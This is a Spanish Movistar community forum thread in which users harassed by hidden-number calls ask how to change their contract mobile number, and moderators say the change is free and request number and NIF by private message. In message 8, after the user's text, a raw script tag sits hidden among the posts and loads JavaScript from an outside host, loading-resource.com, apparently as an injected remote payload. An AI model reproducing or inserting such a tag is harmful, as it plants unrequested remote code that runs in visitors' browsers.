Quiero cambiar mi numero de movil movistar contrato

ro0283am
Me electrocuté con el PLC
Quiero cambiar mi numero de movil movistar contrato

Hola porfavor , quiziera cambiar mi numero de movil de contrato acutalmente recibo muchisimas llamadas con ocultos , insultos etc.. hoy he enviado un fax como me indico el 1004 , tambien me dijo que podia ir a una tienda pero he ido a 4 tiendas en diferentes localidades  y me han dicho que es a travez del 1004 , por favor me podría decir alguien comercial cual es el estado de ese fax ? si ha llegado y cuando me van a dar mi numero nuevo? es urgente es super incomoda la situacion mi numero es 6xxxxxxxx y es el que quiero que me cambien. Gracias un saludo

Mensaje 1 de 32
76.383 Visitas
31 RESPUESTAS 31
Virginia-Movistar
Antiguo Moderador

Hola @ro0283am

 

Bienvenido a la comunidad antes de nada Emoticono feliz

 

Antes de que sigas posteando te ruego que leas las normas y funcionamiento de la comunidad y te presentes en el foro de bienvenida para que los usuarios puedan conocerte Emoticono feliz

 

En cuanto a lo del cambio del nº envíame un mp con el nº a cambiar y el nif del titular y te lo gestionamos mañana mismo

 

SaludosEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 2 de 32
75.168 Visitas
ro0283am
Me electrocuté con el PLC

Vale muchisimas gracias , ya te lo he enviado , sin querer se ha enviado dos veces lo siento 😞 , espero que mañana ya disponga de mi nuevo numero y que me lo comuniquen para saber cual es mi nuevo numero , muchas gracias un saludo.

Mensaje 3 de 32
75.157 Visitas
Virginia-Movistar
Antiguo Moderador

Hola @ro0283am

 

Veo que ya tienes tu nº nuevo,

 

Por favor ponerlo todo en público para eso os ponemos el enlace con las normas del foro Emoticono feliz

 

saludosGuiño



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 4 de 32
75.121 Visitas
Coreybruyah
Más integrado que la RDSI
Buenos días:
Me encuentro en la misma situación. Me gustaría cambiar de numero porque recibo llamadas de números ocultos. He llamado al 1004 y me mandan a una tienda, de la tienda al 1004. Aver si me pudierais echar un cable para ver como pudiera cambiar de numero lo antes posible.
Muchas gracias de antemano
Mensaje 5 de 32
75.059 Visitas
Isa-L-movistar
Antiguo Moderador

Buenos días, @Coreybruyah!Emoticono feliz

Para gestionar el cambio de número debes dirigirte a un Distribuidor de Movistar, no tiene coste, aquí te dejo un enlace donde puedes consultar las Tiendas

Saludos.Guiño




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 6 de 32
75.055 Visitas
ro0283am
Me electrocuté con el PLC
Hola a mi me lo cambiaron a travez de esta comunidad y todo correcto 🙂 intenta que te lo cambien por aqui asi no tendras que ir a una tienda , supongo que dependerá del moderador/a 🙂 Suerte
Mensaje 7 de 32
74.996 Visitas
ssndra
Más integrado que la RDSI

hola ami hace unos dias atras y aun siguen llamandome con oculto y  es bastante molesto y tambien tengo targeta de movil con contrato me gustaria saber qe puedo hacer para cambiarme de numero,si cuesta dinero..espero respuestas pronto,gracias.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>
Mensaje 8 de 32
74.660 Visitas
TaniaN-movistar
Antiguo Moderador

Hola @ssndra

 

 

El cambio de nº de teléfono móvil es gratuito y no supone pérdida de antigüedad, puntos o contrato de permanencia Guiño

 

En caso de que tengas contrato algún servicio o plan cerrado comercialmente, al realizar el cambio éstos se pierden, por lo que tendrías que solicitar una nueva tarifa. En este enlace dispones de información sobre las tarifas que actualmente se encuentran vigentes.

 

Si te interesa que te ayudemos a realizar el cambio, puedes enviarme un mensaje privado con tu nº de teléfono móvil y Nif, y compruebo si puedo ayudarte Emoticono feliz

 

 

Un saludo!



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 9 de 32
74.653 Visitas
MR.SHANKLY
Más integrado que la RDSI

Hola!

He llegado a aquí porque también necesito cambiar mi número de móvil y quería saber el procedimiento

Yo tengo el Movistar Fusión (ADSL + Móvil) desde hace 1 par de semanas, aunque el número de móvil ya lo usaba desde hace años (en parte necesito cambiarlo por eso)

No tengo problema en ir a una tienda Movistar pero soy minusválido y preferiría no hacer más viajecitos de los necesarios

por ejemplo, ¿El Corte Inglés o Media Markt se consideran tiendas Movistar a estos efectos?

Si alguien puede orientarme o darme los pasos exactos a seguir se lo agradecería mucho

 

También prometo entrar más en esta comunidad para compartir mis experiencias 🙂

 

PD: No he mandado ningún MP porque lo "prohiben" las [url=http://comunidad.movistar.es/t5/Contrataci%C3%B3n-Precios-y/Nuevo-en-la-Comunidad-Lee-esto-antes-de-... normas y funcionamiento de la comunidad [/url]

si se puede hacer algo ya me lo decís

 

 

 

GRACIAS

Mensaje 10 de 32
74.504 Visitas
TaniaN-movistar
Antiguo Moderador

Hola @ssndra

 

 

 

Acabo de leer tu mp Emoticono feliz El cambio de nº de teléfono móvil, como te comentaba un poco más arriba, sí es posible y además es gratuito. El contrato de permanencia que hay vigente en tu línea no se modifica, conservarías los puntos que hay acumulados, y además el tipo de contrato que tienes (Contrato Básico Personal) lo vas a seguir manteniendo.

 

En caso de que te interese que hagamos el cambio, avísame por favor Guiño

 

 

Un saludo Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 11 de 32
74.446 Visitas
TaniaN-movistar
Antiguo Moderador

Hola @MR.SHANKLY

 
 
 
Puedes solicitar un cambio de nº de teléfono móvil en la línea que tienes asociada a Movistar Fusión Guiño  Al igual que le comentaba a @ssndra no va a suponer incumplimiento del contrato de permanencia asociado al servicio Fusión.
 
Puedes solicitarlo en un Distribuidor Movistar (en este Buscador de tiendas disponible en la web puedes localizar las más cercanas a tu domicilio) o si lo deseas y me envías un mensaje privado con los siguientes datos, compruebo si te puedo ayudar Guiño
 
  • nº de teléfono móvil.
  • Nif del titular de Movistar Fusión.

 

 

Un saludo Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 12 de 32
74.439 Visitas
MR.SHANKLY
Más integrado que la RDSI

Ya me lo cambiaron

gracias en cualquier caso 🙂

Mensaje 13 de 32
74.428 Visitas
RrAaKkeeLl
Más integrado que la RDSI

Hola, me gustaría cambiar mi numero actual de movil de contrato ya que actualmente estoy siendo acosada por una persona recibiendo múltiples mensajes y watsapps a parte, esta persona me sigue porque los watsapps son diciéndome lo que hago y dijo de hacer. A esta persona la conozco e estoy intentando alejarme de él lo más posible ya que mensajes de watsapp por el momento no son suficientes para poder denunciarlo.
Agradecería poder cambiar mi numero pero no volver a recibir esta clase de mensajes y/o Watsapp.

Mensaje 14 de 32
74.107 Visitas
OscarL-Movistar
Antiguo Moderador

Hola RrAaKkeeLl,

 

Bienvenida a la Comunidad Movistar Emoticono feliz

 

Cuando tengas un momento, puedes enviarme un mp con el número de teléfono y NIF para ayudarte con lo que solicitas.

Por cierto, si te sirve de ayuda, en la configuración del Whatsapp tienes la opción de bloquear algunos contactos.

Espero que esa modificación te ayude a alejarte de esa persona.

 

Un saludo.



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 15 de 32
74.096 Visitas
RrAaKkeeLl
Más integrado que la RDSI

Ya te he enviado lo que me pediste, ara como veo si me as respondido por un mensaje privado?

 

Como seré avisada del cambio?

Mensaje 16 de 32
74.077 Visitas
OscarL-Movistar
Antiguo Moderador

Hola RrAaKkeeLl,

 

En la parte superior de la página tendrá que aparecerte un sobre con el número de privados que tienes, por ejemplo ahora mismo tendrías que tener almenos 1.

 

De todos modos intentaré informarte siempre desde el hilo al menos que te facilita información con datos privados. Cuando puedas mira ese mp.

 

Un saludo!!



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 17 de 32
74.058 Visitas
morayflamenka
Mi vida cambió con el ADSL

Buenos días. Me llamo María y me acabo de registrar en Comunidad Movistar debido a que tengo el mismo problema que andais publicando por aquí y estaba buscando posibles soluciones a través de la web.

 

Yo quisiera cambiar de número de téléfono por motivos variados que afectan a mi derecho a la intimidad. Por supuesto, me gustaría saber si es gratuito o conlleva coste alguno y la forma más sencilla de proceder al trámite. Además, añado que tengo un compromiso de permanencia aun de un año con esta compañía y supongo que por nada se verá modificado.

 

Espero que alguien pueda ayudarme. Muchas gracias por su atención.

Mensaje 18 de 32
74.022 Visitas
Emma-Movistar
Antiguo Moderador

 

Hola @morayflamenka

 

El cambio de numero, coste no tiene. Cuando puedas me envias un privado con el nº de movil y el d.n.i y ya lo miramos.

Un salu2Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 19 de 32
74.017 Visitas
morayflamenka
Mi vida cambió con el ADSL

Hola. LLevo unas cuantas horas tratando de solucionar mi problema y estoy bastante indignada. Esta mañana estuve buscando a través de internet y me dirigí a este foro pidiendo ayuda, sin haber obtenido aun respuesta. Además me ausenté del trabajo para dirigirme a un distribuidor de la compañía y me dijeron que llamase a los dos números de atención al cliente. LLamé una vez a cada uno y me dijeron que no podían ayudarme, es decir, que tenía que ir a una tienda. Y digo... si de ahí vengo... Total, que me fui nuevamente a otros dos distribuidores distintos para "escuchar" lo que me decían, volviendo a faltar al trabajo, y me volvieron a decir exactamente lo mismo de llamar a atención al cliente. Creo que esa no es forma de tratar a un cliente y menos aun cuando estás pagando por unos servicios y tienes unos derechos como consumidor, no como para que te tengan "de un lado para otro". De veras, les pido nuevamente ayuda porque para mi es demasiado importante poner fin a esto. Además, en una de las llamadas incluso me dijeron que la única solución es hacer desaparecer la línea y he llegado a pensar en esta posibilidad, pues mi indignación se multiplica al asociar a mi problema el hecho de recibir esta atención tan deficiente por parte de la compañía.

Mensaje 20 de 32
73.995 Visitas
mrfear
Yo probé el VDSL

Yo tambien estoy en las mismas...

Me tienen frito con llamadas ocultas, otras intentando localizar a otra persona que no soy yo....

¿¿Podriais echarme un cable para cambiar el numero de telefono???

 

PD:No me envieis por favor al distribuidor ya que todos los de mi zona, digamos que no son muy eficientes ni eficaces..

Y digo todos los distribuidores de mi ciudad por que los he recorrido todos!!!!

Mensaje 21 de 32
73.772 Visitas
mrfear
Yo probé el VDSL

Podria contactar conmigo alguien para realizar el cambio.

Gracias

Mensaje 22 de 32
73.677 Visitas
Emma-Movistar
Antiguo Moderador

 

Hola @mrfear

Cuando puedas me envias un privado con el nº de movil y el d.n.i  y ya te informamos

Un saludo.Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 23 de 32
73.674 Visitas
mrfear
Yo probé el VDSL

Muchas gracias por su respuesta, ya le he enviado la informacion por privado.

Mensaje 24 de 32
73.666 Visitas
Emma-Movistar
Antiguo Moderador

 

Hola @mrfear

 

Te acabo de enviar un privado, cuando puedas me contestas vale??? Gracias

 

Un saludo.Emoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 25 de 32
73.663 Visitas